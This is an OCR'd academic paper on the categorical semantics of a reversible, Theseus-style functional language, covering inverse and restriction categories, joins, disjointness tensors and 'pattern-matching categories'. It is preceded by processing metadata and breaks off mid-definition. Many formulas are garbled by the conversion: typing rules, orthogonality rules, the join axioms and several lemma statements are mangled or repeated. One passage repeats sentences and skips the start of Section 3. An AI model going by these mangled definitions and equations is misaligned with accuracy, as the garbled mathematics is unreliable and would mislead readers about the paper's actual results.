"google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 42159, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 42159, null]], "pdf_page_numbers": [[0, 2283, 1], [2283, 5553, 2], [5553, 8891, 3], [8891, 11617, 4], [11617, 14991, 5], [14991, 17683, 6], [17683, 19812, 7], [19812, 21661, 8], [21661, 25096, 9], [25096, 28318, 10], [28318, 31365, 11], [31365, 33385, 12], [33385, 36718, 13], [36718, 39050, 14], [39050, 40064, 15], [40064, 42159, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 42159, 0.04516]]}
olmocr_science_pdfs
2024-12-12
2024-12-12
337d901aa26969f347daa99ef738fe9cc93bc97c
Categorical Semantics of Reversible Pattern-Matching Kostia Chardonnet Université Paris-Saclay, CNRS, ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France Université de Paris, CNRS, IRIF, F-75006, Paris, France Louis Lemmonier Université Paris-Saclay, CNRS, ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France Benoît Valiron Université Paris-Saclay, CNRS, CentraleSupélec ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France Abstract This paper is concerned with categorical structures for reversible computation. In particular, we focus on a typed, functional reversible language based on Theseus. We discuss how join inverse rig categories do not in general capture pattern-matching, the core construct Theseus uses to enforce reversibility. We then derive a categorical structure to add to join inverse rig categories in order to capture pattern-matching. We show how such a structure makes an adequate model for reversible pattern-matching. Keywords: Reversible Computation, Category Theory. 1 Introduction In this paper, we are concerned with the semantics of reversible programming languages. The idea of reversible computation comes from Landauer and Bennett [1,2] with the analysis of its expressivity, and the relationship between irreversible computing and dissipation of energy. This lead to an interest in reversible computation [3,4], both with a low-level approach [5,6,7], and from a high-level perspective [8,9,10,11,12,13,14,15,16]. Reversible programming lies on the latter side of the spectrum, and two main approaches have been followed. Embodied by Janus [8,9,17,10] and later R-CORE and R-WHILE [18], the first one focuses on imperative languages whose control flow is inherently reversible—the main issue with this aspect being tests and loops. The other approach is concerned with the design of functional languages with structured data and related case-analysis, or pattern-matching [14,15,12,13,16]. To ensure reversibility, strong constraints have to be established on the pattern-matching in order to maintain reversibility. In general, reversible computation captures partial injective maps [18] from inputs to outputs, or, equivalently in this paper, partial isomorphisms. Indeed, from a computational perspective reversibility is understood as a time-local property: if each time-step of the execution of the computation can soundly be reversed, there is no overall condition on the global behavior of the computation. In particular, this does not say anything about termination: a computation seen as a map from inputs to outputs might very well be partial, as some inputs may trigger a (global) non-terminating behavior. The categorical analysis of partial injective maps have been thoroughly analyzed since 1979, first by Kastl [19], and then by Cockett and Lack [20,21,22]. This led to the development of inverse category: a category equipped with an inverse operator in which all morphisms have partial inverses and are therefore reversible. The main aspect of this line of research is that partiality can have a purely algebraic description: one can introduce a restriction operator on morphisms, associating to a morphism a partial identity on its domain. This paper will be published in the proceedings of MFPS XXXVII URL: https://www.coalg.org/calco-mfps2021/mfps/ This categorical framework has recently been put to use to develop the semantics of specific reversible programming constructs and concrete reversible languages: analysis of recursion in the context of reversibility [23,24,25], formalization of reversible flowchart languages [26,27], analysis of side-effects [28,29], etc. Interestingly enough however, the adequacy of the developed categorical constructs with reversible functional programming languages has been seldom studied. For instance, if Kaarsgaard et al. [30] mention Theseus as a potential use-case, they do not discuss it in details. So far, the semantics of functional and applicative reversible languages has always been done in concrete categories of partial isomorphisms [25,31]. In particular, one important aspect that has not been addressed yet in detail is the categorical interpretation of pattern-matching. If pattern-matching can be added to reversible imperative languages [18], it is particularly relevant in the context of functional languages where it is one of the core construct needed for manipulating structured data. This is for instance emphasized by the several existing languages making use of it [14,15,12,16,13,32]. In the literature, pattern-matching has either been considered in the context of a Set-based semantics [18], or more generally in categorical models making heavy use of rig structures [33] or co-products [25,31] to represent it. If such rich structures are clearly enough to capture pattern-matching, we claim that they are too coarse, and that a weaker structure is enough for characterizing pattern-matching. Contributions. In this paper, we make a proposal for a general categorical interpretation of pattern-matching in the context of inverse categories, without having to rely on external structure such as coproducts. More specifically, we study the categorical semantics of a typed, linear and reversible language in the style of Theseus [12]. We develop and discuss pattern-matching categories: a categorical construction shown to be sufficient to model the pattern-matching at the heart of the operational semantics of the language. In particular, in this category we can mimic the notion of clauses and values to be matched against them, without to have to rely on coproducts. We conclude the paper with a proof that pattern-matching categories make adequate models for the considered language, thus confirming the validity of the approach. This paper is organized as follows: first, in Section 2 we present the language based on [13], its type system and rewriting system along with the usual safety properties. We then give some reminder on inverse categories and set the theoretical background for the rest of the paper in Section 3. Basic knowledge in category theory is assumed. Finally, sections 4 and 5 are focused on the categorical semantics of the language. The proofs are available in the appendix. 2 The language In this section, we present a small, formal reversible functional programming language in the like of Theseus [12] and its later developments [13,32]. The core feature of Theseus is to define reversible control-flow using pattern-matching. Doing so elegantly bridges functional programming and reversible computation in a typed manner: well-typed, terminating programs describe isomorphisms between types. In previous —untyped— approaches [14], pattern-matching was simply considered as one language feature among many, without any special attention devoted to it, and the reversible aspect was taken care of separately. On the contrary, Theseus uses pattern matching as the core feature to make the language reversible. In the context of a typed pattern-matching, the compiler can easily verify two crucial properties: (i) non-overlapping patterns in clauses, ensuring deterministic behavior, and (ii) exhaustive coverage of a datatype with the patterns, ensuring totality. In [13], these properties are shown sufficient to produce a simple first-order reversible programming language. In this paper we relax the constraints on exhaustivity, making it possible to define partial functions. 2.1 Terms and Types The language we focus on in this paper is a weakened version of the language presented in [13, Sec.2]. In particular, we allow non-exhaustive pattern-matching and enum types. The language is typed and consists of two layers: values and functions (called “isos” in [13]). It is parametrized by a set of enum types (spanned by α) and their constant values (spanned by c_α). The language whose only type α is the unit-type with one single unit constant will be called the minimal language. \[ \begin{align*} \text{(Value types)} & \quad a, b ::= \alpha \mid a \oplus b \mid a \otimes b \\ \text{(Iso types)} & \quad T ::= a \leftrightarrow b \\ \text{(Values)} & \quad v ::= c_\alpha \mid x \mid \text{inj}_1 v \mid \text{inj}_r v \mid \langle v_1, v_2 \rangle \\ \text{(Functions)} & \quad \omega ::= \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} \\ \text{(Terms)} & \quad t ::= v \mid \omega t \end{align*} \] The language comes with two kinds of judgments, one for terms and one for functions (or isos). We denote typing contexts as \( \Delta \), they stand for sets of typed variables \( x_1 : a_1, \ldots, x_n : a_n \). We then write \( \Delta \vdash v : a \) for a well-typed term and \( \vdash_\omega \omega : a \leftrightarrow b \) for a well-typed function. Beside the linearity aspect (used to ensure injectivity), the typing rules for terms are standard. The typing judgment of a term is valid if it can be derived from the following rules. \[ \frac{c_\alpha \vdash a}{c_\alpha : \alpha}, \quad x : a \vdash x : a, \quad \Delta_1, \Delta_2 \vdash v_1 : a \quad \Delta_1, \Delta_2 \vdash v_2 : b, \quad \Delta \vdash v : a \quad \Delta \vdash \text{inj}_v : a \leftrightarrow b \] In particular, while a value can have free variables, a term is always closed. This difference is explained by the fact that values are used as patterns in clauses. The typing rule for isos is as follows. \[ \frac{\Delta_1 \vdash v_1 : a \quad \Delta_1 \vdash v_1' : b \quad \cdots \quad \Delta_n \vdash v_n : a \quad \forall i \neq j, v_i \perp v_j \quad \Delta_n \vdash v_n' : b \quad \forall i \neq j, v_i' \perp v_j'}{\vdash_\omega \{ v_1 \leftrightarrow v_1', \ldots, v_n \leftrightarrow v_n' \} : a \leftrightarrow b} \] The rule relies on the condition that both left- and right-hand-side patterns in clauses are orthogonal, enforcing non-overlapping. The rules for deriving orthogonality of values (or patterns) are the following. \[ \frac{c_\alpha \neq d_\alpha \quad c_\alpha \vdash \text{inj}_v : a \quad \text{inj}_v : b \quad \text{inj}_v \vdash \text{inj}_v : a \quad \text{inj}_v \vdash \text{inj}_v : b}{\text{inj}_v : a \leftrightarrow b} \] Left and right injections generates disjoint subsets of values, and distinct constants of an enum type \( \alpha \) are orthogonal. ### 2.2 Operational semantics The language is equipped with a simple call-by-value operational semantics on terms based on matching and substitution. We recall the formalization proposed in [13], with the notion of valuation: partial map from a finite set of variables (the support) to a set of values. We denote the matching of a value \( w \) against a pattern \( v \) and its associated valuation \( \sigma \) as \( \sigma[v] = w \). It is defined as follows. \[ \sigma[c_\alpha] = c_\alpha \quad \sigma[x] = v \quad \sigma[\text{inj}_v] = \text{inj}_v w \quad \sigma[\text{inj}_v] = \text{inj}_v w \] \[ \sigma[v_1] = w_1 \quad \sigma[v_2] = w_2 \quad \text{supp}(\sigma_1) \cap \text{supp}(\sigma_2) = \emptyset \quad \sigma = \sigma_1 \cup \sigma_2 \] \[ \sigma[(v_1, v_2)] = (w_1, w_2) \] Whenever \( \sigma \) is a valuation whose support contains the variables of \( v \), we write \( \sigma(v) \) for the value where the variables of \( v \) have been replaced with the corresponding values in \( \sigma \), as follows: - \( \sigma(c_\alpha) = c_\alpha \), - \( \sigma(x) = v \) if \( \{ x \mapsto v \} \subseteq \sigma \), - \( \sigma(\text{inj}_v) = \text{inj}_\sigma(v) \), - \( \sigma(\text{inj}_v \sigma(v)) = \text{inj}_\sigma \sigma(v) \), - \( \sigma((v_1, v_2)) = (\sigma(v_1), \sigma(v_2)) \). **Definition 2.1 (Reduction)** The reduction \( \rightarrow \) is then defined as the smallest relation such that \( \omega t \rightarrow \omega t' \) whenever \( t \rightarrow t' \) and such that, provided that \( \sigma[v] = v \), the redex \[ \{ v_1 \leftrightarrow v_1', \ldots, v_n \leftrightarrow v_n' \} \quad v \] reduces to \( \sigma(v'_1) \). As usual, we write \( s \to t \) to say that \( s \) rewrites in one step to \( t \) and \( s \to^* t \) to say that \( s \) rewrites to \( t \) in 0 or more steps. 2.3 Properties The language satisfies usual safety properties, and, although not necessarily total, functions are indeed reversible. In this section we formalize these results. **Remark 2.2** The reduction is deterministic: if \( s \to t \) and \( s \to t' \) then \( t = t' \). Because of the conditions set on patterns in the typing rule of isos, the rewrite system is deterministic. Note that, since we do not impose exhaustivity, the reduction might get stuck. Nonetheless, the following properties hold [13]. **Lemma 2.3 (Subject reduction)** If \( \vdash_v s : a \) and \( s \to t \) then \( \vdash_v t : a \). □ **Lemma 2.4 (Termination)** If \( \vdash_v s : a \) then there exists a term \( t \) that does not reduce such that \( s \to^* t \). □ The small language presented in this section can be called reversible. In this section we formalize these results. The language satisfies usual safety properties, and, although not necessarily total, functions are indeed reversible. In this section we formalize these results. The category \( \text{PInj} \) has been extensively studied and its structure analyzed within the framework of inverse categories [19,20,21,22,34,35]. These categories formalize the notion of partial inverse morphisms and also conveys a natural definition of joins (without relying on coproducts) —least upper bounds—, which shall be shown as the best way to denote the pattern-matching, as discussed in Example 3.1. This section therefore aims at a rapid introduction to inverse categories: it contains the necessary material needed to read and understand the remaining sections: it is far from stating all the results and interests of restriction and inverse categories. A reader interested in the subject may for instance refer to [20,21,22,34,35] for further information. 3.1 Restriction category The definition of a proper partial function requires a formal way to write the “domain” of a morphism \( f \), through a partial identity \( \overline{f} \) called restriction. **Definition 3.2 (Restriction [20])** A restriction structure is an operator that maps each morphism \( f : A \to B \) to a morphism \( \overline{f} : A \to A \) such that \[ f \circ \overline{f} = f \quad (2) \quad \overline{f} \circ \overline{g} = \overline{g} \circ \overline{f} \quad (3) \quad \overline{f} \circ \overline{g} = \overline{g} \circ \overline{f} \quad (4) \quad \overline{h} \circ f = f \circ \overline{h} \circ f \quad (5) \] A morphism \( f \) is said to be total if \( \overline{f} = 1_A \). A category with a restriction structure is called a restriction category. **Remark 3.3** When unambiguous, we write \( gf \) for the composition \( g \circ f \). **Example 3.4** Any category can be given a restriction structure by saying that all morphisms are total, but this is definitely not interesting as a model. The standard non trivial example of restriction category is \( Pfn \), the category of sets and partial functions. Given a partial function \( f : A \to B \), we can define its restriction operator as \( \overline{f}(x) = x \) on the domain of \( f \) and undefined otherwise. Throughout this paper, we manipulate functors. These are often required to keep the restriction structure intact; hence the following definition. **Definition 3.5 (Restriction functor [30])** A functor \( F : C \to D \) is a restriction functor if \( F(\overline{f}) = \overline{F(f)} \) for all morphism \( f \) of \( C \). The definition is canonically extended to bifunctors. 3.2 Inverse category Our goal is to denote reversible operations: this requires some form of inverse. The restriction operator gives a notion of domain of morphisms, and moreover, \( \overline{f} \) is meant as an identity function on this domain; thus the composition of \( f \) with its presumed inverse should be equal to its restriction. Hence the next definition. Note that inverse categories were invented [19] before restriction categories, but the order of definitions used here is believed more convenient by the authors. **Definition 3.6 (Inverse category [30])** An inverse category is a restriction category where all morphisms are partial isomorphisms; meaning that for \( f : A \to B \), there exists a unique \( f^\circ : B \to A \) such that \( f^\circ \circ f = \overline{f} \) and \( f \circ f^\circ = \overline{f^\circ} \). The canonical example of inverse category is \( PInj \), the category of sets and partial injective functions. It is actually more than canonical: **Theorem 3.7 ([19])** Every locally small inverse category is isomorphic to a subcategory of \( PInj \). **Example 3.8** Let us fix a non-empty set \( S \). We then define \( PId_S \) as the category with one object * and with morphisms all of the sets \( Y \subseteq S \). Composition is defined as intersection and the identity is \( S \). Intersection also gives us a monoidal structure with unit \( S \). Note that the category \( PId_S \) can be regarded as a subcategory of \( PInj \), where each morphism \( Y \subseteq S \) corresponds to a partial identity defined on \( Y \). The category \( PId_S \) can be endowed with a structure of inverse category by defining morphisms as their own restriction and partial inverse. From \( PId_S \) we can define \( PId_S^\circ \) as the inverse category whose objects are (generic) sets, and morphisms are defined as follows: \( f : A \to B \) is a pair \( f = (\sigma_f, \{X^*_a\}_{a \in \text{dom}(\sigma_f)}) \) where \( \sigma_f \) is a partial injective map between sets \( A \to B \), and where each \( X^*_a \) is a morphism of \( PId_S \). Composition in \( PId_S^\circ \) is done pairwise with classical composition of functions for \( \sigma \) and the composition in \( PId_S \) for the rest. The identity over \( A \) is the pair made of the set-identity on \( A \) together with \( S \) for each \( a \in A \). The restriction and partial inverse are generated from those of \( PInj \) and \( PId_S \) for each element in the pair. 3.3 Compatibility To give a denotation to isos in the programming language considered in Section 2, it is compulsory to find a way to combine terms such as \( \omega_1 \) and \( \omega_2 \) in Example 3.1. More generally speaking, we need to combine morphisms of the same type \( A \to B \) to make a “join” morphism. First, we have to make sure that the morphisms are compatible: \( f \) and \( g \) are compatible if they are alike on their common “domain”, and can behave however they like when the other does not apply. Since we aim at building a model for (partial) bijections, compatibility of the partial inverse is also checked. Definition 3.9 (Restriction compatible [30]) Two morphisms \( f, g : A \to B \) in a restriction category \( C \) are restriction compatible if \( fg = gf \). The relation is written \( f \sim g \). If \( C \) is an inverse category, they are inverse compatible if \( f \sim g \) and \( f^\circ \sim g^\circ \), noted \( f \bowtie g \). A set \( S \) of morphisms of the same type \( A \to B \) is restriction compatible (resp. inverse compatible) if all elements of \( S \) are pairwise restriction compatible (resp. inverse compatible). Example 3.10 In \( P\text{Inj} \), let us consider \( f, g : \{a, b, c\} \to \{a, b, c\} \) defined as identities on their domains where: \( \text{dom}(f) = \{a, b\}, \text{dom}(g) = \{b, c\} \). It is pretty clear that \( f \bowtie g \). However, if we consider \( h : \{a, b, c\} \to \{a, b, c\} \) defined on \( \{b, c\} \) as \( h(b) = a \) and \( h(c) = c \), then \( f \bowtie h \) are not compatible. 3.4 Joins and ordering on morphisms When considering partial set-functions, a natural notion of order can be built on functions by considering domain-inclusion: we can say that \( f \preceq g \) if \( g \) is defined on the whole “domain” of \( f \) and both behave the same there. When considering models of reversible languages, joins are used to model pattern-matching [34,31]: each clause is a partial function, and the complete pattern-matching can then be represented with the join of the clauses. This notion can be extended to restriction categories as follows. Definition 3.11 (Partial order [20]) Let \( f, g : A \to B \) be two morphisms in a restriction category. We then define \( f \preceq g \) as \( gf = f \). Example 3.12 Consider \( P\text{Id}_S \) from Example 3.8: we have \( X \preceq Y \) iff \( X \subseteq Y \). For \( P\text{Id}_S \), we have \( f \preceq g \) iff \( \text{dom}(\sigma_f) \subseteq \text{dom}(\sigma_g) \) and, for all \( a \in \text{dom}(\sigma_f) \), \( \sigma_f(a) = \sigma_g(a) \), and, for all \( a \in \text{dom}(\sigma_f) \), \( X \preceq Y \). Proposition 3.13 Let us consider \( f, g : A \to B \) such that \( f \preceq g \). Then, whenever \( h : B \to C \), we have \( hf \preceq gh \). Similarly, whenever \( h : C \to A \) we have \( fh \preceq gh \). As discussed in Example 3.1, the isos \( \omega_1 \) and \( \omega_2 \) can be combine to form the “join” morphism \( \omega \). This notion of join is defined in the context of restriction categories as follows. Definition 3.14 (Joins [35]) A restriction category \( C \) is equipped with joins if for all restriction compatible sets \( S \) of morphisms \( A \to B \), there exists \( \bigvee \mathcal{A}_S : A \to B \) morphism of \( C \) such that, whenever \( t : A \to B \) and whenever for all \( s \in \mathcal{A}_S \), \( s \leq t \), \[ \begin{align*} \forall s \in \mathcal{A}_S & \quad s \leq \bigvee \mathcal{A}_S, \\ \bigvee \mathcal{A}_S & = \bigvee \mathcal{A}_S, \\ \bigvee \mathcal{A}_S & = \bigvee \mathcal{A}_S \circ \cdot \bigvee \mathcal{A}_S, \\ \bigvee \mathcal{A}_S & = \bigvee \mathcal{A}_S. \end{align*} \] Such a category is called a join restriction category. An inverse category with joins is called a join inverse category. Example 3.15 Consider the morphisms \( f, g \) from Example 3.10. They are compatible, and \( f \preceq g = 1_{\{a, b, c\}} \). It is easy to verify that e.g. \( f \preceq 1_{\{a, b, c\}} \) and \( g \preceq 1_{\{a, b, c\}} \). Let us consider \( h, k, l : \{a, b, c\} \to \{a, b, c\} \) such that \( h(a) = b \) and undefined otherwise, \( k(b) = c \) and undefined otherwise, and \( l \) defined as \( l(a) = b, l(b) = c \) and \( l(c) = a \). We have \( h \preceq l \) and \( k \preceq l \). Besides, \( h \bowtie k \) is the function whose domain is \( \{a, b\} \) and sending \( a \mapsto b \) and \( b \mapsto c \). We therefore have \( h \bowtie k \preceq l \). The join operator admits a unit, as follows. Definition 3.16 (Zero [30]) Since \( \emptyset \subseteq \text{Hom}_C(A, B) \), and since all of its elements are restriction compatible, there exists a morphism \( 0_{A,B} \in \bigvee_{s \in \emptyset} s \), called zero. Lemma 3.17 (30) Whenever well-typed, the zero satisfies the following equations: \( f0 = 0, 0g = 0, 0_{X \to Y}^X = 0_{Y \leftarrow X}, 0_{A \to B} = 0_{B \to A}, 0_{A,B} = 0_{A,A} \). 4 Semantics of isos In this section, we turn to the question of representing the terms and isos of the language presented in Section 2. Instead of using the concrete category \( P\text{Inj} \) as suggested in the header of Section 3, we aim at using general, inverse categories. 4.1 Representing choice and pairing One of the problem to overcome is the denotation of pairing and sums. If a standard categorical denotation for the former is a monoidal structure, the latter is usually represented with coproducts. Such a notion is however slightly insufficient. Indeed, for being able to join independent clauses in pattern-matching (as shown e.g. in Example 3.1), it has to interact well with the restriction structure. This lead to the development of disjointness tensor. If Giles [34] was the first one to introduce the notion of disjointness tensors, in this paper we rely on the definition of [30]. **Definition 4.1 (Disjointness tensor [30])** An inverse category \( C \) is said to have a disjointness tensor if it is equipped with a restriction bifunctor \( \otimes: C \times C \to C \), with a unit object \( 0 \) and morphisms \( \iota_1: A \to A \otimes B \) and \( \iota_2: B \to A \otimes B \) that are total and such that \( \overline{\iota_1} \overline{\iota_2} = 0_{A \otimes B} \). **Lemma 4.2 ([34])** A disjointness tensor \((0,0)\) in a category \( C \) gives rise to a structure of coproduct: for all objects \( A \) and \( B \) of \( C \), \((A \oplus B, \iota_A, \iota_B)\) is a coproduct for \( A \) and \( B \). To model the types of Section 2, we therefore essentially need a disjointness tensor and a monoidal structure. Similar to what happen in the category \( \text{PInj} \), they need to relate through distributivity. **Definition 4.3 ([31])** Let us consider a join inverse category equipped with a symmetric monoidal tensor product \((\otimes, 1)\) and a disjointness tensor \((0,0)\) that are join preserving, and such that there is an isomorphism \( \delta_{A,B,C}: (A \otimes (B \oplus C)) \to (A \otimes B) \oplus (A \otimes C) \). This is called a join inverse rig category. **Example 4.4** The category \( \text{PId}^2 \) is a join inverse rig category with the following structure: - \( A \otimes B = A \times B \), the usual cartesian product. If \( f: A \to B \) and \( g: C \to D \) then we define \( \sigma_{f \otimes g}(a,c) \mapsto (\sigma_f(a), \sigma_g(c)) \) and \( X_{f \otimes g}(a,c) = X_f(a) \cap X_g(c) \). The unit 1 is the singleton set. - \( A \oplus B = A \uplus B \), the disjoint union. If \( f: A \to B \) and \( g: C \to D \) we define \( \sigma_{f \oplus g}(\iota_1(a)) \mapsto \iota_1(\sigma_f(a)), \sigma_{f \oplus g}(\iota_2(c)) \mapsto \iota_2(\sigma_g(c)) \), \( X_{f \oplus g}(\iota_1(a)) = X_f(a), X_{f \oplus g}(\iota_2(c)) = X_g(c) \). The zero is the empty set. Note how in \( \text{PId}^2 \) if \( S \) is of cardinality at least 2 there are several morphisms \( 1 \to 1 \). In particular a morphism \( 1 \to 1 \oplus 1 \) is not necessarily an injection. 4.2 Orthogonality between morphisms In the description of the language, the definition of isos heavily relies on orthogonality. In this section we define this notion over morphisms in an inverse category. General definitions of orthogonality in inverse categories exist, but we have chosen to manipulate a more practical one. Our notion introduced below verifies all the axioms set in [34] for orthogonality of morphisms. We shall then see in this section that orthogonal values produce disjoint morphisms. **Definition 4.5 (Disjointness)** \( f: A \to B, g: A \to C \) are disjoint iff \( \overline{f} \overline{g} = 0 \). To picture it, one may say that disjoint morphisms have an empty common domain of definition. We can then prove that some of the axioms of morphism orthogonality stated in [34] hold for disjointness, expressed with the lemmas below. **Lemma 4.6 (Left-composed disjointness)** Let \( f_1: A \to B_1, f_2: A \to B_2, g_1: B_1 \to C_1, g_2: B_2 \to C_2 \) be morphisms. If \( \overline{f_1} \overline{f_2} = 0 \), then \( \overline{g_1 f_1} \overline{g_2 f_2} = 0 \). **Lemma 4.7 (Right-composed disjointness)** Let \( f: A \to B, g: A \to C, h: D \to A \) be morphisms. If \( \overline{f} \overline{g} = 0 \) then \( \overline{fh} = 0 \). **Lemma 4.8 (Disjoint compatibility)** If \( \overline{f_1} \overline{f_2} = 0 \) then \( f_1 \sim f_2 \). This last lemma is very natural: if two morphisms apply on strictly different domains, they are compatible. It also allows to underline that disjointness is a right choice to picture orthogonality. 4.3 Semantics of types and values In order to model the types of the language presented in Section 2, the most natural is to consider a join inverse rig category to capture the tensor and the sum-type. Let us then fix such a join inverse rig category \( C \). Each type \( \alpha \) is given an interpretation as an object in the category \( C \), written \( [\alpha] \). If a type \( \alpha \) has \( n \) constants, it is necessary to choose \( [\alpha] \) such that there are \( n \) morphisms \( f_1^\alpha: 1 \to [\alpha] \) (\( i = 1 \ldots n \)) that are total and pairwise disjoint, following Definition 4.5. The set of these morphisms will be written \( S_\alpha \). A sequence of types or of terms is denoted with the tensor product of the interpretations: \( [\Delta] = [\alpha_1] \otimes \cdots \otimes [\alpha_n] \) whenever \( \Delta \equiv x_1: \alpha_1, \ldots, x_n: \alpha_n \). Then we define the semantics of values and terms by induction on their definition: we set \( [[c_\alpha]] = f^\alpha_\alpha \in S_\alpha \). The typing judgment of variables gives the following denotation: \[ x : a \vdash x : a \] \[ 1_{[a]} : [a] \to [a]. \] Now let us consider \( f = [\Delta \vdash v : a] \). We have the following denotation: \[ [\Delta \vdash \text{inj}_j v : a \oplus b] = 1_j \circ f, \] and similarly for the right-projection. If \( f = [\Delta_1 \vdash v_1 : a_1] \) and \( g = [\Delta_2 \vdash v_2 : a_2] \), we can define \([\Delta_1, \Delta_2 \vdash (v_1, v_2) : a_1 \oplus a_2] = f \oplus g\). When \( \Delta_1, \Delta_2 \) are empty, \( f \oplus g : 1 \oplus 1 \to [a_1] \oplus [a_2] \) will be identified with the type \( 1 \to [a_1] \oplus [a_2] \) since there is a total isomorphism between \( 1 \) and \( 1 \). **Remark 4.9** By abuse of notation, we shall write \([v]\) in place of \([\Delta \vdash v : a]\) when the context is clear. The semantics of values \( v_1, v_2 \) of type \( a \) within a context \( \Delta \) are morphisms \([\Delta] \to [a]\). The interesting part in terms of orthogonality is the codomain of these morphisms: intuitively, if they were sets, we would want them to be disjoint. This explains why we are able to define morphisms such as \([v] : [a] \to [a]\) in the following lemma. **Lemma 4.10 (Orthogonality)** If \( v_1 \perp v_2 \), then \([v_1] \cap [v_2] = 0\). Lemma 4.10 is proven by induction on the definition of orthogonality over values. It heavily relies on the fact that \( \pi_l \pi_r = 0 \), property of our category \( C \) that we have settled with Definition 4.1. ### 4.4 Iso semantics The aim of this section is to build the denotation of isos: \[ \vdash \omega \{ v_1 \leftrightarrow v_1' | \ldots | v_n \leftrightarrow v_n' \} : a \leftrightarrow b. \] Such a denotation should be a morphism \([a] \to [b]\). It should directly depend on the denotation of the individual clauses, as hinted in Example 3.1. Within the inverse rig category \( C \), we aim at showing that \([\omega] [v_i]\) is equal to \([v_i]' [v_i]' [v_i]. \) This shows that the morphisms that we need to join are of the form \([v_i]' \circ [v_i]'\): we thus need them to be compatible. Their compatibility is a direct conclusion of Lemmas 4.6, 4.8 and 4.10. **Lemma 4.11** If \( v_1 \perp v_2 \) and \( v_1' \perp v_2' \), then \([v_1]' \circ [v_1]' \cap [v_2]' = 0\). **Definition 4.12** For a well-typed iso \( \{ v_1 \leftrightarrow v_1' \ldots | v_n \leftrightarrow v_n' \} \), thanks to the orthogonality constraints on clauses the morphisms \([v_i]' \circ [v_i]'\) form a family of pairwise compatible morphisms. We can rely on it to build the semantics of isos as \[ \vdash \omega \{ v_1 \leftrightarrow v_1' | v_2 \leftrightarrow v_2' \ldots \} : a \leftrightarrow b = \bigvee_i [v_i]' \circ [v_i]' : [a] \to [b]. \] We can finally define the denotational semantics of the remaining terms of the language. Let \( F \) be the denotation \([\vdash \omega \omega : a \leftrightarrow b]\) and \( g \) be \([\vdash v \ t : a]\). Then \([\vdash v \ \omega t : b]\) is \( F \circ g\). ### 4.5 Towards soundness In order to validate the semantics, a standard expected result is soundness: the fact that whenever \( t \to t' \) we also have \([t] = [t']\). The main difficulty lies in the denotation \([\omega t]\) in Definition 4.12. Indeed, suppose that \( \omega : a \leftrightarrow b \) is defined as \( \{ v_1 \leftrightarrow v_1' \ | v_2 \leftrightarrow v_2' \} \). Whenever a closed term \( t \) of type \( a \) reduces to \( w \), and that \( \omega \ w \) reduces, thanks to the safety properties we know that there exists some \( i \) and a substitution \( \sigma \) such that \( \sigma[v_i] = w \) and \( \omega t \rightarrow^* \sigma(v_i') \). We therefore need \([\omega t]\) to be equal to \([\sigma(v_i')]\), that is, since we should have \([t] = [w]\) if we had soundness, \[ (([v_i]' \circ [v_i]' \cap ([v_i]' \circ [v_i]' \cap [w])) = 0 \cap [v_i]' \circ [v_i]' \circ [w]. \] This amounts to ask that the pattern matching carries over joins in the category. In the literature [36,37,34,23,31], the problem is solved by capitalizing on sum-like monoidal tensors, in particular the disjointness tensor of Giles [34]. As sketched in [31], one can follow the following strategy. First, one has to make sure that the denotation maps all types to objects of the form \( 1 \oplus \cdots \oplus 1 \). Then, capitalizing on the structure of language, one shows that the only possible morphisms of type \( 1 \to 1 \oplus \cdots \oplus 1 \) representable in the language are coproduct injections. The behavior of the pattern-matching is then categorically mimicked, getting Equation (12) directly from the properties of the injections. However, as for instance in the category \( \text{PId}_\delta \) of Example 4.4, in general join inverse rig categories morphisms of type \( 1 \to 1 \oplus \cdots \oplus 1 \) are not necessarily injections. This calls for a weaker condition, independent from the coproduct. This is the subject of the next section. 5 Pattern-matching categories As discussed in Section 4.5, the denotation of iso is a join over several morphisms, each mapping a particular pattern to its image through the iso. In the operational semantics, the “choice” of the pattern is expressed over the notion of orthogonality of values: indeed, if a value matches a pattern, this value is necessarily orthogonal to the other patterns. This is ensured by the straightforward definition of orthogonality. We have presented in Section 4.5 a way to transfer this notion of orthogonality to morphisms in join inverse rig categories, based on the structure of disjointness tensor. In this section, we discuss a notion of categorical pattern-matching independently from disjointness tensors, in particular generalizing the approach of [34,31]. This is the main contribution of the paper. Example 5.1 To illustrate our approach, consider a language only consisting of (1) tensors and (2) enum- types \( \alpha = \{e_\alpha\} \) and \( \beta = \{c_\beta, d_\beta, e_\beta\} \). Let us then consider the full subcategory of \( \text{PInj} \), with objects consisting of the sets of cardinality power of 3. This sub-category can serve as a sound model of the language, including the pattern-matching. Note how the handling of the pattern-matching is independent from any disjointness tensor as the category does not feature coproducts. 5.1 Non decomposability and pattern-matching categories Concretely, in order to get pattern-matching, we manipulate expressions of the form \((f \lor g)h\) and the idea would be to find a property over \(h\) which would lead to either \((f \lor g)h\) being equal either to \(fh\) or to \(gh\), without having to rely on coproduct injections. For this matter, we introduce several definitions of non decomposability—roughly meaning that the morphism cannot be written with a join. Definition 5.2 (Strongly non decomposable) A morphism \(h : A \to B\) in a join inverse category is called strongly non decomposable (snd) when if \(h = f \lor g\) with \(f, g : A \to B\), then \(f = 0\) or \(g = 0\). Definition 5.3 (Linearly non decomposable) A morphism \(h : A \to B\) in a join inverse category is called linearly non decomposable (lnd) when if \(f \leq h\) and \(g \leq h\) with \(f, g : A \to B\), then \(f \leq g\) or \(g \leq f\). Definition 5.4 (Weakly non decomposable) A morphism \(h : A \to B\) in a join inverse category is called weakly non decomposable (wnd) when 